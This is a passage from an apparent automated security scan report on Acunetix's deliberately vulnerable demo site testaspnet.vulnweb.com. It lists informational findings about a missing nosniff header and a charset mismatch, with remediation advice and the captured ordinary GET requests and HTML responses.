11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
Instances	40
Solution	Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages. If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.
Reference	http://msdn.microsoft.com/en-us/library/ie/gg622941%28v=vs.85%29.aspx https://owasp.org/www-community/Security_Headers
Tags	OWASP_2021_A05 OWASP_2017_A06
CWE Id	693
WASC Id	15
Plugin Id	10021

Informational	Charset Mismatch (Header Versus Meta Content-Type Charset)
Description	This check identifies responses where the HTTP Content-Type header declares a charset different from the charset defined by the body of the HTML or XML. When there's a charset mismatch between the HTTP header and content body Web browsers can be forced into an undesirable content-sniffing mode to determine the content's correct character set. An attacker could manipulate content on the page to be interpreted in an encoding of their choice. For example, if an attacker can control content at the beginning of the page, they could inject script using UTF-7 encoded text and manipulate some browsers into interpreting that text.

URL	http://testaspnet.vulnweb.com
Method	GET
Parameter
Attack
Evidence
Show / hide Request and Response
Request Header - size: 219 bytes.	GET http://testaspnet.vulnweb.com HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache
Request Body - size: 0 bytes.
Response Header - size: 296 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:14 GMT Content-Length: 14064
Response Body - size: 14,064 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/
Method	GET
Parameter
Attack
Evidence
Show / hide Request and Response
Request Header - size: 220 bytes.	GET http://testaspnet.vulnweb.com/ HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache
Request Body - size: 0 bytes.
Response Header - size: 296 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=p2ttr345zecuqfmoxygyermi; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:14 GMT Content-Length: 14064
Response Body - size: 14,064 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 